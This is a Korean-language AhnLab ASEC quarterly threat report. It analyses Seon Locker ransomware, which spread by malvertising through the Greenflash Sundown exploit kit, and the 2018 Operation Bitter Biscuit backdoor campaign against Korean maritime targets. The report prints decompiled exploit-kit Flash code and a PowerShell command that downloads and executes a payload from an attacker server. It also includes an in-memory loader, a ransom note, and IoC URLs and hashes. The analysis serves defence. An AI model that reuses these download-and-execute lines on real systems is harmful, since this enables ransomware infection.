ASEC REPORT VOL 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안

ASEC REPORT VOL.93 2018 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 더많은정보는안랩닷컴 (www. ahnlab.com) 에서확인하실수있습니다. 2018 년 4 분기보안동향 Table of Contents 보안이슈 SECURITY ISSUE 선락커랜섬웨어, 웹사이트접속만으로 감염된다 04 악성코드상세분석 ANALYSIS-IN-DEPTH 오퍼레이션비터비스킷 2018 년공격동향 15 ASEC REPORT Vol.93 Security Trend 2

보안이슈 SECURITY ISSUE 선락커랜섬웨어, 웹사이트 접속만으로감염된다

선락커랜섬웨어, 보안이슈 Security Issue 웹사이트접속만으로 감염된다 2018년 4분기, 온라인광고를통해멀버타이징기법으로유포된새로운랜섬웨어선락커 (Seon Locker) 가발견되었다. 악성코드 (Malware) 와광고 (Advertising) 의합성어인멀버타이징 (Malvertising) 기법은웹사이트에삽입되는광고를이용하여랜섬웨어를유포하는방식으로짧은시간동안다수의사용자에게노출되기때문에파급효과가크다. 특히이번에발견된랜섬웨어는국내언론사사이트의제휴광고에서발견된것으로보아, 공격자가국내사용자를타깃으로삼은것으로추정된다. 또한드라이브-바이다운로드 (Drive-by Download) 기법을이용해사용자들이감염사실을쉽게인지하지못하도록했다는것이특징이다. 안랩시큐리티대응센터 (AhnLab Security Emergency-response Center, 이하 ASEC) 는국내웹사 이트의광고를이용해유포된선락커랜섬웨어의공격기법과함께공격과정을면밀히분석했다. 01. 공격개요 그림 1-1 드라이브 - 바이다운로드 (Drive-By Download) 개요 ASEC REPORT Vol.93 Security Trend 4

공격자는선락커랜섬웨어유포를위해드라이브 - 바이다운로드기법을이용했다. 세부적인동작방식 은 [ 그림 1-1] 과같이사용자가파일다운로드를승인한경우와승인하지않은경우두가지로구분된다. 사용자가다운로드를승인한경우, 사용자가설치결과를알수없는파일이다운로드되어사용자의의도와는다른결과가나타난다. 한편사용자가다운로드를승인하지않은경우에도다운로드가발생한다. 이경우, 공격자는사용자의다운로드승인없이악성코드를다운로드하기위해인터넷익스플로러, 어도비플래시플레이어, 윈도우보안취약점등을악용한다. 그림 1-2 드라이브 - 바이다운로드 (Drive-By Download) 공격과정 (1) 공격자는드라이브 - 바이다운로드공격을위해 [ 그림 1-2] 와같이익스플로잇킷 (Exploit Kit) 을이용 한다. 해당익스플로잇킷에는프로그램의보안취약점을공격하는스크립트와악성코드가포함되는 데, 이번공격에서는그린플래시선다운 (Greenflash Sundown) 익스플로잇킷이사용됐다. 그림 1-3 드라이브 - 바이다운로드 (Drive-By Download) 공격과정 (2) ASEC REPORT Vol.93 Security Trend 5

익스플로잇킷을실행하기위해서는사용자가악성스크립트가삽입된웹사이트에방문해야한다. 공 격자는 [ 그림 1-3] 과같이정상사이트로위장한디코이 (Decoy) 사이트를제작하거나정상사이트를 해킹하여악성스크립트를삽입했다. 또한온라인광고를이용한멀버타이징기법을이용하기도했다. 최종적으로사용자가인터넷서핑중해당악성스크립트가삽입된웹사이트에접속하면 [ 그림 1-4] 와같이공격자서버에업로드된그린플래시선다운익스플로잇이실행된다. 이때시스템에보안취약점이존재할경우, 사용자도모르는사이시스템이악성코드에감염된다. 이와같은드라이브 - 바이다운로드공격은사용 그림 1-4 드라이브 - 바이다운로드 (Drive-By Download) 공격과정 (3) 자가악성코드감염사실을쉽게인지할수없다. 2. 공격과정공격자는그린플래시선다운익스플로잇킷을사용하기위해웹사이트에악성스크립트를삽입한다. 특징적인점은 [ 그림 1-5] 와같이국내언론사사이트에악성스크립트를삽입한것으로, 공격자는모든웹페이지에스크립트를삽입하는대신사용자의방문빈도수가높은웹페이지를주공격대상으로삼았다. 또한해당악성스크립트는웹페이지방문시사 용된웹브라우저가인터넷익스플로러 (Internet 그림 1-5 국내언론사사이트의웹페이지에삽입된악성스크립트 ASEC REPORT Vol.93 Security Trend 6

Explorer) 일경우에만그린플래시선다운익스플로잇킷의랜딩페이지 (Landing Page) 로연결시킨다. 랜딩페이지에연결되면어도비플래시플레이어의보안취약점을이용하기위해프로그램의버전을체크한다. 이번공격에사용된스크립트의경우플래시플레이어의메이저 (Major) 버전이 10 이상, 29 이하일경우에만위의명령어가실행된다. [ 표 1-1] 은그린플래시선다운익스플로잇킷랜딩페이지의일부다. Landing Page(ads.html) <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="400"> <param name="movie" value="http://adop.us/show_ads.js" /> <param name="play" value="true" /> <param name="allowscriptaccess" value="always" /> 표 1-1 그린플래시선다운익스플로잇킷 - 랜딩페이지일부 조건이충족되어명령어가실행되면악성플래시파일이실행되는데, 그린플래시선다운익스플로잇 킷은탐지우회를위해총 3 단계의플래시파일로구성되어있다. SWF File(show_ads.js) var url:string = "B64Z5BF4fDB7eOg7J6BLc4o2aQUsCESreQ=="; var url_key:string = "QVNPbTIzbmxkMw=="; var url_key_byt:bytearray = new ByteArray(); var key:string = generaterandomstring(10); key_byte = new ByteArray(); key_byte.writemultibyte(key,"utf8"); var token:string = processdata(key); key = ""; if(activex == Capabilities.playerType) { url_dec = Rc4(Base64.decodeToByteArray(url_key),Base64.decodeToByteArray(url)); data_load = new URLLoader(); data_load.dataformat = URLLoaderDataFormat.BINARY; data_load.addeventlistener(event.complete,_jj18); _dv34 = new URLRequest(url_dec + "?token=" + encodeuricomponent(token)); data_load.load(_dv34); } 표 1-2 그린플래시선다운익스플로잇킷 플래시파일 (1 단계 ) 먼저 1 단계플래시파일에는 2 단계플래시파일의연결주소가스트링변수 url 에저장되어있다. 스트 링변수는 [ 표 1-2] 와같이 RC4 암호화방식을이용하여암호화되어있으므로이를복호화하여스트 ASEC REPORT Vol.93 Security Trend 7

링변수 url_dec 에다시저장된다. 이후영문대소문자와숫자가조합된 10 자리의랜덤문자열을생성 하여스트링변수키 (key) 에저장한다. SWF File(show_ads.js) var processdata:function = function(param1:string):string { var _loc2_:* = "-----BEGIN PUBLIC KEY-----\n" + "MFswDQYJKoZIhvcNAQEBBQADSgAwRwJAbkQoqittIfJPWqUP/O45yh9ZfI8hAae2\n" + "f0f8oqsehrucrlfezcxpwljgjqs426haiy/ifpsc3hdaykho9ytpbwidaqab\n" + "-----END PUBLIC KEY-----"; var _loc3_:bytearray = new ByteArray(); var _loc4_:bytearray = new ByteArray(); var _loc5_:string = ""; var _loc6_:rsakey = PEM.readRSAPublicKey(_loc2_); _loc3_ = Hex.toArray(Hex.fromString(param1)); _loc6_.encrypt(_loc3_,_loc4_,_loc3_.length); _loc5_ = Base64.encodeByteArray(_loc4_); return _loc5_; }; 표 1-3 그린플래시선다운익스플로잇킷 플래시파일 (1 단계 ) 저장한키는 [ 표 1-3] 과같이공격자의공개키를사용한 RSA 암호화방식으로다시암호화하여스트 링변수토큰 (token) 에저장된다. 이렇게생성된 url_dec 와토큰을조합하여 [ 표 1-4] 와같이 2 단계 플래시파일의연결을요청한다. Landing Page(ads.js) http://url_dec + "?token=" + encodeuricomponent(token) http://adop[.]pro/index.php?token=yefhwrkw0w5onnecvy... 생략 표 1-4 그린플래시선다운익스플로잇킷 플래시파일 (1 단계 ) 공격자서버에서 2단계플래시파일의연결이요청되면전달받은토큰을복호화하여키값을복원한다. 복원된키값으로 2단계플래시파일을 RC4 암호화방식으로암호화하여전송한다. 해당과정은 [ 그림 1-6] 과같다. 그림 1-6 그린플래시선다운익스플로잇킷 플래시파일 (1 단계 ) 전송받은암호화된 2 단계플래시파일은복호 ASEC REPORT Vol.93 Security Trend 8

화되어메모리상에실행되는데, [ 표 1-5] 와같이 2 단계플래시파일에는 3 단계플래시파일의연결 주소가스트링변수 wewqqww 에저장되어있다. 이전과마찬가지로 RC4 암호화방식을이용하여암호화되어있으므로복호화하여사용하는데이때사 용하는키값에서차이점을발견할수있다. 이전 1 단계플래시파일에서는키값으로랜덤문자열 10 자 리를사용했으나, 2 단계플래시파일에서는 3 단계플래시파일의연결주소를키값으로사용한다. SWF File(index.php) jjeiejiee = new ByteArray(); var _ver1:boolean = false; var wewqqqww:string = " Q 생략,09090909090909 생략 "; var askjdskjw:number = 0; wewqqqww = wewqqqww.substr(0,wewqqqww.indexof(",")); var kwkw:string = "21"; var ddds3:string = mnznnznxzxzxzx(wewqqqww,kwkw); var sdkdjddd2:string = ""; sdkdjddd2 = ddds3.substr(7,ddds3.lastindexof("/") - 7); kbkiuiuui = new ByteArray(); kbkiuiuui.writeutfbytes(sdkdjddd2); if(zxzxzzszx()) { zbzvzzzzzzx = new URLLoader(); zbzvzzzzzzx.dataformat = URLLoaderDataFormat.BINARY; zbzvzzzzzzx.addeventlistener(event.complete,zxxzxnmmzz); request = new URLRequest(mnznnznxzxzxzx(wewqqqww,kwkw)); zbzvzzzzzzx.load(request); var zxzxzzszx:function = function():boolean { var _loc1_:string = Capabilities.version; _loc1_ = _loc1_.substr(4); _loc1_ = _loc1_.replace(/[,]/g,""); var _loc2_:uint = uint(_loc1_); if(! pop()) { return false; } if(_loc2_ < 2800164) { if(_loc2_ > 2100164) { } return true; } return false; }; 표 1-5 그린플래시선다운익스플로잇킷 플래시파일 (2 단계 ) 또한 2단계플래시파일에서는 3단계플래시파일을연결하기전사용자시스템에설치된플래시플레이어의버전을확인한다. [ 표 1-5] 와같이만약버전이 28.00.164보다높을경우에는 3단계플래시파일을연결하지않는다. 3 단계플래시파일에는 [ 그림 1-7] 과같이어도 그림 1-7 그린플래시선다운익스플로잇킷 플래시파일 (3 단계 ) ASEC REPORT Vol.93 Security Trend 9

비플래시플레이어의보안취약점 CVE-2018-4878 에사용되는쉘코드가존재한다. 쉘코드가실행 되면시스템에 [ 표 1-6] 의명령어를실행한다. Command Line cmd.exe /q /c "powershell.exe -nop -w hidden -c $J=nEw-objEct net.webclient; $J.proxy=[NEt.WEbREquESt]::GEtSyStEmWEbProxy(); $J.Proxy.CrEdEntIalS=[NEt.CrEdEntIalCachE]::DEfaultCrEdEntIalS; IEX $J.downloadStrIng('http://lloydss.bestdealsadvbiz.space/index.php');" 릱릱.. 생략 표 1-6 명령어정보 해당명령어가실행되면윈도우운영체제의스크립트언어를실행하는파워쉘 (Powershell) 을이용하 여공격자서버로부터악성코드실행을위한데이터를요청한다. 공격자서버로부터전송받은데이터는한번더 Base64 와 Gzip 으로암호화되어있어복호화가필 요하다. Command Line [Byte[]]$key = [System.Text.Encoding]::ASCII.GetBytes("LU5V") $m = new-object System.Net.WebClient; [Byte[]]$data = $m.downloaddata("http://lloydss.bestdealsadvbiz.space/index.php?mk="+$av_base+"&sq="+$vm_base) [Byte[]]$iJF = rc4 $data $key $b0z = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((mu kernel32.dll VirtualAlloc), (k9no_ @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $ijf.length,0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($iJF, 0, $b0z, $ijf.length) 표 1-7 복호화한 index.php 페이지일부 복호화된데이터의일부를확인해보면 [ 표 1-7] 과같이플래시파일에서사용된것과마찬가지로 RC4 암호화를복호화하는코드와안티바이러스제품설치확인 (Window Defender), 시스템계정정보확인, 인코딩된바이너리를다운로드하기위한 URL 주소정보가존재한다. 최종적으로해당 URL에서다운로드된파일이사용자시스템에서악성행위를하게된다. ASEC REPORT Vol.93 Security Trend 10

지금까지확인된인코딩된바이너리는갠드크랩 (Gandcrab) 랜섬웨어와선락커랜섬웨어다. 다운로드된갠드크랩은 v5.04 버전으로, 관련내용은 ASEC 블로그에서확인할수있다. 한편, 이번에발견된선락커랜섬웨어의일련의 행위를살펴보면다음과같다. 먼저파워쉘을통 그림 1-8 인코딩된바이너리와디코딩된바이너리 해추가인코딩된바이너리가복호화된다. 이후 쉘코드가 MZ 부터 dave 문자열을찾을때까지메모리상에바이너리를복사한후선락커랜섬웨어 가실행될수있도록한다. 이는파일이생성되지않고, 메모리상에서실행되는파일리스기법으로선 락커랜섬웨어의특징중하나다. 또한선락커랜섬웨어는먼저기감염여부확인을위해 [ 표 1-8] 의레지스트리경로에키의유무를 확인한다. HKEY_CURRENT_USER\Software\GUN\Display\windowData 표 1-8 레지스트리경로 Registry path 만약해당레지스트리키가있다면그대로실행을종료한다. 키값이없는경우에는 0x30 크기의난수를생성하여 fixt_rbhz1htkfbhxsijz와 XOR 연산을하고, 인코딩을진행한뒤 0x50 크기의데이터를 [ 그림 1-9] 와같은레지스트리값으로저장한다. 해당레지스트리에저장된값은 추후복호화에사용한다. 그림 1-9 레지스트리값 ASEC REPORT Vol.93 Security Trend 11

선락커랜섬웨어는 GetDriveTypeW API 를이용해 A:\ 부터 Z:\ 까지 DRIVE_FIXED, DRIVE_REMOTE 에해당하는드라이브만감염대상으로삼는다. 드라이브경로검색과정은 [ 그림 1-10] 과같다. 그림 1-10 드라이브경로검색 또한암호화를위해파일명검사를진행하는데검사를위해문자열을모두소문자로변경하여검사한 다. 따라서악성코드에저장된암호화제외대상문자열은모두소문자다. 암호화제외대상 폴더 파일 system volume information programdata application data $windows.~bt program files tor browser Windows mozilla appdata windows.old program files (x86) $recycle.bin google boot bootsect.bak ntuser.ini thumbs.db your_files_are_encrypted.txt ntldr iconcache.db desktop.ini ntuser.dat.log bootfont.bin ntuser.dat boot.ini autorun.inf 확장자 mod adv dll msstyles mpa nomedia ocx cmd ps1 themepack sys prf diagcfg cab ldf diagpkg icl 386 ico cur ics ani bat com rtp diagcab nls msc deskthemepack idx msp msu cpl bin shs wpx icns exe rom theme hlp spl fixt lnk scr drv 표 1-9 암호화제외폴더, 파일및확장자 ASEC REPORT Vol.93 Security Trend 12

최종적으로선락커랜섬웨어는 [ 표 1-9] 의암호화제외대상을제외한나머지파일을모두암호화한뒤파일명뒤에 *.FIXT를추가한다. 암호화제외확장자에 fixt가포함된것을보아재감염을한번더방지하는것으로추정된다. 또한선락커랜섬웨어는파일암호화와상관없이폴더를들어갈때랜섬노트 YOUR_FILES_ARE_ENCRYPTED.TXT 파일을생성하며, 시스템감염이끝나면파워쉘이종료되어메모리에서사라진다. 선락커랜섬웨어의랜섬노트정보는 [ 표 1-10] 과같다. YOUR_FILES_ARE_ENCRYPTED.TXT SEON RANSOMWARE all your files has been encrypted There is only way to get your files back: contact with us, pay and get decryptor software We accept Bitcoin and other cryptocurrencies You can decrypt 1 file for free write email to kleomicro@gmail.com or kleomicro@dicksinhisan.us 표 1-10 랜섬노트정보 지금까지살펴본것처럼선락커랜섬웨어는국내웹사이트를주요공격대상으로삼고있으며, 사용자가모르는사이웹사이트접속만으로도랜섬웨어에감염될수있어각별한주의가필요하다. 이와같은랜섬웨어감염피해를예방하기위해서는무엇보다보안업데이트를정기적으로설치하고, 백신및응용프로그램을항상최신버전으로유지하는등지속적인 PC 관리가필요하다. V3 제품군에서는해당선락커랜섬웨어를다음과같은진단명으로탐지하고있다. < V3 제품군진단명 > Malware/Gen.Generic (2018.10.25.00) Powershell/Seoncrypt (2018.11.16.00) BinImage/EncPE (2018.11.16.00) Malware/MDP.Ransom.M1996 ASEC REPORT Vol.93 Security Trend 13

악성코드 상세분석 ANALYSIS-IN-DEPTH 오퍼레이션비터비스킷 2018 년공격동향

악성코드상세분석 Analysis-In-Depth 오퍼레이션비터비스킷 2018 년공격동향 일명 오퍼레이션비터비스킷 (Operation Bitter Biscuit) 으로불리는공격은 2011년을기점으로본격화되었다. 비소날 (Bisonal) 류악성코드를이용하여국내군사기관, 방위산업체등의주요기관을표적으로삼아오랜기간동안공격을전개해왔다. 지난 2017년가을이후소강상태로접어드는것처럼보였던이공격은 2018년에또다시포착됐다. 한편, 공격에사용된비소날 (Bisonal) 류악성코드와관련해다수의공격그룹과의연관성이제기되었다. 안랩또한지난 2017년 3분기 ASEC Report를통해오퍼레이션비터비스킷의공격동향을다룬바있다. 이번보고서에서는 2018 년국내에서발생한실제공격사례를중심으로안랩시큐리티대응센터 (AhnLab Security Emergency-response Center, 이하 ASEC) 에서분석한오퍼레이션비터비스 킷의공격동향과공격기법을살펴본다. 01. 오퍼레이션비터비스킷공격동향 2010년최초발견된비소날류의악성코드는오퍼레이션비터비스킷공격에주로이용되며 2018년현재까지한국, 일본, 인도, 러시아등에대한공격에지속적으로등장했다. 국내에서는 2011년에최초발견되었으며, 다음해인 2012년에는일본의방위산업체에대한공격에이용되기도했다. 한편 2015 년인도 CERT에서는비소날변형인비오아지흐 (Bioazih) 에대해경고한바있다. 1 ASEC REPORT Vol.93 Security Trend 15

오퍼레이션비터비스킷의공격동향을분석한결과, 여전히비소날류악성코드가국내주요기관을노린공격에활발히사용됐음을확인했다. 2011년부터 2012년봄까지는국내기관에대한공격을수행하였으며, 2013년부터 2015년사이에는국내기업과군사기업에대한공격이계속됐다. 또한 2016 년과 2017년에는방위산업체와연관업체에대한공격이진행되었으며, 가장최근인 2018년에는국내해양관련분야에까지공격을집중적으로수행하며점차공격대상을확대한것으로보인다. 이와같이오퍼레이션비터비스킷의공격이오랜기간에걸쳐진행되면서안랩은지속적으로이들공격그룹을분석및추적해왔다. 02. 2018년국내공격사례 [ 표 2-1] 은 2018년오퍼레이션비터비스킷의주요공격을타임라인으로정리한것이다. 2017년가을이후잠잠하던공격은 2018년봄부터다시시작되었다. 2018년 3월부터 7월까지국내해양산업분야에대한공격이확인되었다. 일시 공격대상 내용 2018년 3월? ( 해양분야추정 ) 퇴사인수인계자료.scr로공격시도. 다운로더생성 2018년 3월 한국정부기구 2018년해양경찰청공무원 (7급 9급 ) (2018.03.05).pdf.exe로공격시도. 백도어생성 2018년 3월? ( 해양분야추정 ) 중형방탄정업무연락망1.pdf.exe로공격시도. 백도어생성 2018년 7월? ( 해양분야추정 ) 해양업체관련문서로위장. 패킹된다운로더생성 2018년 9월 한국정부기구 백도어만발견됨 표 2-1 2018년주요공격타임라인 2018 년공격의특징적인점은공격자가새로운드롭퍼 (Dropper) 를사용한다는점이다. 새롭게바뀐 드롭퍼가실행되면사용자를유인하는디코이 (Decoy) 문서를비롯해악성코드와 VBS(Visual Basic Script) 파일을생성한다. [ 그림 2-1] 의 2018 년에발견된악성코드의디코이문서내용을통해공격자는해양분야와관련된사 람에게공격을집중하고있음을확인할수있다. ASEC REPORT Vol.93 Security Trend 16

드롭퍼를통해생성되는악성코드는추가악성코드를다운로드하는다운로더 (Downloader) 와원격명령을수행하는백도어 (Backdoor) 로구분된다. 발견된악성코드중일부는파일끝에쓰레기값을추가해수십메가바이트 (Megabyte) 에서최대 100 메가바이트정도의길이를가진 그림 2-1 2018 년발견된악성코드의디코이문서들 거대파일을생성하기도한다. 한편생성되는 VBS 파일의경우, 디코이문서를보여주는스크립트와실행된드롭퍼및실행된 VBS 파일자신을삭 제하는스크립트로나뉜다. 03. 악성코드분석 2018 년오퍼레이션비터비스킷공격에이용된드롭퍼, 다운로더, 백도어를살펴보자. 3-1) 드롭퍼 (Dropper) 분석 2018 년 3 월 5 일발견된 퇴사인수인계자료.scr 파일이드롭퍼로사용되었다. 드롭퍼의기본정보는 [ 표 2-2] 와같다. 파일이름 퇴사인수인계자료.scr 파일길이 260,968 파일생성기간 2015 년 12 월 26 일 22 시 1 분 29 초 (UTC 기준 ) MD5 SHA1 SHA256 주요기능및특징안랩진단명 e5a8c1df0360baeeeab767d8422cc58f 0ba6787751e7e80c0911f666fd42a175dd419e0e 013c87898926de3f6cc8266c79c7888d92eb1546a49493d1433b8261d2e41e77 디코이 (Decoy) 문서, 실행파일, VBS 파일생성 Dropper/Win32.Bisonal 표 2-2 드롭퍼기본정보 해당드롭퍼가실행되면 [ 그림 2-2] 와같이디코이 (Decoy) 문서, 실행파일, VBS 파일이생성된다. ASEC REPORT Vol.93 Security Trend 17

그림 2-2 악성코드구성 앞서언급한것처럼디코이문서를통해공격대상을유추할수있는데, 2018년발견된드롭퍼의디코이문서는모두국내해양분야와관련된내용이다. 또한실행파일은다운로더이며, 다른변형은백도어를포함하기도한다. 2개의 VBS 파일은디코이문서를오피스프로그램에서열게하는파일과실행된드롭퍼파일을삭제하는파일로구분된다. 3-2) 다운로더 (Downloader) 분석이번공격에사용된다운로더의주요기능및특징은실행된파일이름을검사하여 services.exe가아니면 c:\users\[username]\applications\microsoft 경로등에 services.exe 파일을생성하는것이다. 이때파일끝에쓰레기값을추가하여최종적으로약 4 MB 파일길이를가진파일을생성한다. 다운로더의기본정보는 [ 표 2-3] 과같다. 파일이름 3.tmp 파일길이 10,752 파일생성기간 2018 년 2 월 25 일 00 시 21 분 33 초 (UTC 기준 ) MD5 SHA1 SHA256 주요기능및특징안랩진단명 d198e4632f9c4b9a3efbd6b1ed378d26 bb8be657e4bf1eb9a89ae66cb6c8a8d6baa934d4 4652882a64cc8fe823ab6d7c2166f1dbf9b75794d024ddbfaa173b6f9107a19f 4 메가바이트이상의길이를가진 services.exe를생성. 시스템정보를 ms.log로저장. 추가악성코드를다운로드 Trojan/Win32.Bisdow 표 2-3 다운로더기본정보 ASEC REPORT Vol.93 Security Trend 18

그림 2-3 원본파일과쓰레기값이추가된생성파일 [ 그림 2-3] 은원본파일과다운로더로인해쓰레기값이추가된생성파일을비교한것이다. 이는사 용자가해시값으로악성코드를찾기어렵게하기위해임의의파일을생성하는것으로추정된다. 어 떤변형은 100 MB 정도의길이가진파일을생성하기도했다. 다운로더는실행된파일이름이 services.exe 일경우레지스트리에 services.exe을등록하고 Windows Message.lnk 파일을생성하는데, Windows Message LNK 파일은 [ 그림 2-4] 와같이악성 services.exe의바로가기내용을담 고있다. 그림 2-4 LNK 파일내용 또한 ipconfig.exe, net.exe 을이용해시스템정보를 ms.log 파일에저장하고, http://mp.motlat. com/info/wel.gif 로전송한다. [ 그림 2-5] 는시 스템정보수집내용이다. 2018 년에발견된변형에서만보이는다운로더 의특징은추가파일다운로드를시도할때 [ 그림 그림 2-5 시스템정보수집내용 2-6] 과같이디스크이름을통해가상환경내 ASEC REPORT Vol.93 Security Trend 19

실행을검사하는것이다. 2018 년이전에발견된변형에는가상환경검사기능이존재하지않는다. 그림 2-6 가상환경검사 다운로더는 http://mp.motlat.com/lvs/tips.htm 에서 MsUpdata.exe 파일을다운로드한다. 안랩분석결과, 2018 년 3 월초해당주소에서 msupdata.exe (2c0522a805fa845ec9385eb5400e 8d16) 파일이배포되었음을확인했다. msupdata.exe 역시다른악성코드를다운로드하는다운로더 로, 최종적으로다운로드되는악성코드는확인되지않았다. 3-3) 백도어 (Backdoor) 분석 2018년에는유사한드롭퍼를통해백도어파일이생성되기도했다. 해당백도어와연관된악성코드는 2014년가을부터발견되었다. 동일한공격대상에서비소날변형이함께발견되기도했다. 백도어의기본정보는 [ 표 2-4] 와같다. 파일이름 파일길이 3.tmp 28,672 bytes 파일생성기간 2018 년 2 월 10 일 4 시 10 분 36 초 (UTC 기준 ) MD5 SHA1 SHA256 주요기능및특징안랩진단명 fc78fff75df0291d8c514f595f68c654 aec101161bdfada59b93ef47f1b814e4fea54c9e 6631d7045a2209ca5dbcf5071cb97eaea8cfba2e875a75e5535ba9180aaaf8d1 백도어 Backdoor/Win32.Bisoaks 표 2-4 백도어기본정보 ASEC REPORT Vol.93 Security Trend 20

비소날류변형인이들 Bisoaks 악성코드에서는 [ 그림 2-7] 과같이특징적으로 akspbu.txt, mismyou 와같은문자열이존재한다. 단, 일부악성코드는 PECompact 나 MPRESS 로패킹되어특 징적인문자열을확인할수없다. 그림 2-7 Bisoaks 악성코드의특징적문자열 해당악성코드가실행되면레지스트리의 HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrnetVersion\Run 의 mismyou 에실행된파일을등록한다. 최종적으로 C&C 서버에서전달받은명령을수행하는데, Bisoaks 악성코드에서지원하는기능은시 스템정보수집, 프로세스목록수집, 프로세스종료, 파일다운로드, 파일실행등이다. 일부변형에서 는자가삭제기능등도확인되었다. 04. 연관관계 2018년오퍼레이션비터비스킷공격을분석한결과, 이번공격에서사용된드롭퍼는공격자가새롭게제작한악성코드로추정된다. 하지만다운로더와백도어의경우과거 2014년공격과의연관성이있음이확인되었다. 비소날류변형인 Bisoaks 악성코드또한 2014년과 2018년에동일한곳에유사한코드를가진변형으로공격을수행했다. [ 그림 2-8] 은 2018년오퍼레이션비터비스킷공격에사용된악성코드의관계도이다. ASEC REPORT Vol.93 Security Trend 21

그림 2-8 2018 년공격악성코드관계도 2014 년과 2018 년에발견된다운로더의문자열과코드의유사성 (fd45ecc5b111948507ace52fc95 253ae) 은 [ 그림 2-9] 에서도확인할수있다. 그림 2-9 2014 년과 2018 년다운로더문자열비교 일부변형의다운로드주소는국내와연관되어있다. 또한 [ 그림 2-10] 과같이악성코드파일에안랩 인증서로위장한허위인증서 (00c479bf76dc90db51209d2fa2a9cf6a) 를포함하고있는점으로미 ASEC REPORT Vol.93 Security Trend 22

루어한국이주요공격대상임을추론할수있다. 2018년에발견된 Bisoaks 백도어는특징적문자열이존재하는데, [ 그림 2-11] 과같이 2014년 10 월발견된변형 (45a416f10ccb2c31ff391e61a75 84f1f) 에도유사한문자열이존재하는것이확인 그림 2-10 안랩의디지털서명을사칭한다운로더파일 되었다. 그림 2-11 2014 년 Bisoaks 변형의특징적문자열 [ 그림 2-12] 와같이 2014 년 9 월발견된변형과 2018 년 3 월발견된악성코드의코드또한상당한유 사성을띄고있다. 그림 2-12 2014 년 9 월변형과 2018 년 3 월변형비교 ASEC REPORT Vol.93 Security Trend 23

한편, Bisoaks 악성코드에는캠페인 ID 가포함되어있으며한국에서발견된변형들에서는 0903, 0917, 1016-02, 443, pmo, hjing, 24-kncck, 8000, 95, 48 등이확인되었다. 해당백도어의변형은총 29 개로, 2014 년 9 월부터관련변형이존재하며국내정부기관이주요공격 대상이었다. 따라서이공격자는최소 4 년동안한국에서활동중인것으로추정할수있다. 오퍼레이션비터비스킷공격이하나의그룹에서수행되고있는지는명확히확인되지않았지만, 2018 년의공격동향을통해 Bisoaks 악성코드또한오퍼레이션비터비스킷의연관악성코드로볼수있다. 2014년부터오퍼레이션비터비스킷공격에사용되고있는 Bisoaks 악성코드가 2018년에도유사하게사용되었기때문이다. [ 그림 2-13] 은오퍼레이션비터비스킷에서사용한악성코드를 2009년부터 2018년현재까지나열한것이다. 그림 2-13 오퍼레이션비터비스킷연관악성코드종류 05. 결론지난 2017년가을이후행적을감췄던오퍼레이션비터비스킷은올해 2018년 3월부터다시국내주요기관을향한공격을수행했다. 2017년까지는주로국내군사기업및방위산업체에대한공격을진행한반면 2018년에는해양관련분야에대한공격을집중적으로수행하며공격대상을확대한것으로보인다. 이들이명확히동일한그룹인지는확인되지않았지만, 공격에사용된악성코드의유사성 ASEC REPORT Vol.93 Security Trend 24

으로보아 2018 년봄에확인된공격은적어도 2014 년부터국내정부기관에대한공격을수행해왔음 을추정할수있다. 약 10 년가까이한국을노리고있는미지의위협은여전히은밀하게국내주요기관및기업을공격하 고있다. 2018 년에는해양분야만집중적으로공격했지만, 2019 년에는어느분야를새로운공격대상 으로삼을지오퍼레이션비터비스킷의앞으로의추이를지속적으로예의주시해야할것이다. 06. IoC (Indicators of Compromise) 드롭퍼 (Dropper) 1cd5a3e42e9fa36c342a2a4ea85feeb4 bbfcb2d66784c0f7afc334f18a0866a7 e3bac3712aaca2881d1f82225bb75860 e5a8c1df0360baeeeab767d8422cc58f e6e607ab6bd694ffcfe1451ed367d068 f408653378b02858c0998ee4d726c8b8 다운로더 (Downloader) 00c479bf76dc90db51209d2fa2a9cf6a 2c0522a805fa845ec9385eb5400e8d16 40f69d52559610d1f34f95e7a2c7924c 410a19c9e5d6269e0d690307787e5fea 46224c767a6c2765738a00bb9d797814 862f3c0bd6c1ecee39442271df6e954d b13429ccf79d94a82dab0b30e0789227 d198e4632f9c4b9a3efbd6b1ed378d26 ef3103a76e101f7f19541d1cbbd2bd13 f61c3f0eb173b2c5f38a1c9d5acda0dc fd45ecc5b111948507ace52fc95253ae 백도어 (Backdoor) 3cc4e80a358e0f048138872bc79999cd 45a416f10ccb2c31ff391e61a7584f1f d0efdee5eaaf29cceab4678f652f04f9 fc78fff75df0291d8c514f595f68c654 URL 정보 http://21kmg.my-homeip.net http://img.bealfinerdns.co.kr/script/index.htm http://kecao.my-homeip.de http://mp.motlat.com/info/wel.gif http://pmad.dyndns.myonlineportal.de http://soft.koreagzer.com/news http://hosting.twinkes.net/otete2/css/topblack.php http://info.cherishk.com/rss/vide.php http://live.triphose.com/data/asinfo.htm http://mp.motlat.com/lvs/tips.htm http://sky.versignlist.com/images/jsphore.htm http://wel.versignlist.com/css/skywood.htm http://www.hankookchon.com/css/serverlet.htm 파일이름 chrome.exe conhost.exe contray.exe msupdata.exe msviewer.exe serv.exe services.exe taskhost.exe (100 MB 이상파일길이가짐 ) ASEC REPORT Vol.93 Security Trend 25

ASEC REPORT Vol.93 Security Trend 26